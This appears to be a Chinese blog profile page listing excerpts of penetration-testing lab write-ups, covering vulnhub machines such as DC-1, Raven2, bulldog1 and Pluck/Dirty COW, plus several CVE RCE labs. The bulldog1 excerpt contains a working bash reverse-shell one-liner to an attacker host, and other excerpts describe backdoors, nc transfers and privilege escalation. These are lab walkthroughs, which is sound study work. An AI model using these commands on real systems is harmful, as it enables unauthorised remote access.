- 博客(11)
- 收藏
- 关注
原创 DC-1 靶机渗透学习
DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-1.zip(DC后的数字可以换成1-8中任意一个)下载好后解压好后,用vmvare直接打开虚拟机,导入时可能会提示错误,重试就可以了,打开靶机,打开如下就是正常的,靶机默认桥接。
2023-09-12 19:58:44
186
原创 Raven2靶场渗透
在/var/www/html目录下使用ls查看文件,发现有一个wordpress的文件夹,cd进去寻找信息。访问contact页面时会生成haha.php页面后门,开启侦听,访问mm时会将靶机bash传过来。这里可以看到root是最高权限,所以进行提权,涉及到数据库提权可以使用udf提权方式获取最高权限。再打开readme.md文件,这是一个phpmailer的介绍,在version中查看到版本。访问一下/vendor目录,发现目录有很多的文件。找到flag3的位置,用nc传过来。既然有,话不多说,开干。
2023-08-29 22:48:20
144
1
原创 CFS三层靶机-内网渗透
我们已经知道CentOS 7还有55网段的ip,但是用nmap直接扫是扫不出来的,因为这里扫描是用的kali的ip扫描,模拟的环境中kali和centos是公网主机,所以可以直接扫到,而现在扫的属于内网网段,但CentOS即属于公网也属于内网,那就可以用他来渗透内网,这里使用msf自带的探测网络接口的模块(get_local_subnets)和查看路由的模块(autoroute -p)通过蚂剑的虚拟终端去查看一下CentOS的网卡信息发现还有一个55网段的内网ip,话不多说,继续干。
2023-08-29 10:10:41
371
2
原创 Lampiao靶场
(2)后面是yes的是我们需要填的,这里只需要填写rhosts和rport,填写完后查看没问题直接run启动,可以看到成功连接靶机。2、百度网盘链接:https://pan.baidu.com/s/1bf46UgmyXKoussgLFW_-jg?-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高。(4)进入的是一个伪终端,因此还要将其转换为真终端,执行下面的命令就将其变成了真终端。-T4:指定扫描过程中使用的时序(分为0-5等级,推荐用4)
2023-08-26 18:05:43
122
原创 bulldog1靶场渗透
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
2023-08-26 14:03:09
140
原创 Pluck靶场 脏牛提权(CVE-2016-5195)
漏洞编号:CVE-2016-5195漏洞名称:脏牛漏洞危害:低权限用户利用该漏洞技术可以在全版本上实现本地提权影响范围:Linux kernel >= 2.6.22 ,并且Android也受影响 < 2016-10-18脏牛漏洞名称的来源:Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。
2023-08-26 08:49:36
236
原创 [春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
Pluck-CMS-Pluck-4.7.16 后台RCE。
2023-08-23 23:23:23
449
原创 [春秋云镜]CVE-2022-23906 CMS Made Simple v2.2.15 RCE
CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。
2023-08-23 22:22:26
194
原创 [春秋云镜]CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码。
2023-08-23 21:56:48
258
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人